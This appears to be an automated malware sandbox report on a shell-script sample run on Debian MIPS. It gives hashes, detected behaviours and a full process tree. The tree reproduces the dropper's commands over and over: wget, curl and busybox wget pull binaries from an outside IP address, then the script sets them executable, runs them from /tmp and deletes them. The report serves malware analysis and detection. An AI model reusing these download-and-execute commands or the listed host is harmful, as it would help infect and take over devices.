Analysis
-
max time kernel
68s -
max time network
67s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
-
Size
10KB
-
MD5
d8ec12ed2845ad2e0438b2877c6b582d
-
SHA1
a3ac76cc85f6efe3ee7d9dc250c3167a1316c3b3
-
SHA256
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
-
SHA512
459b2e4080a48df3a9e1bcb0b60ca4c80cc2c0b477289a9db6ac26410638c43ecc9c345277a59f191be55b9b37bf113d558d4d1bc8316777707737d80b280d96
-
SSDEEP
192:P/TslVfHcsv+SU0iyP8okBODl/V1aBVpqcsv+So/TslVNiyP8okrzV1aBV2:P/TslVfHcsv+SU0iyP8oYODlmqcsv+Sg
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:733
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:740
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:746
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:763
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:790
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:809
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:815
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:821
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:846
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:866
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:872
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:878
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:884
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:890
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:896
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:902
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:908
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:914
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:920
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:926
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:932
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:938
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:944
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:950
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:956
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:962
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:968
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:974
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97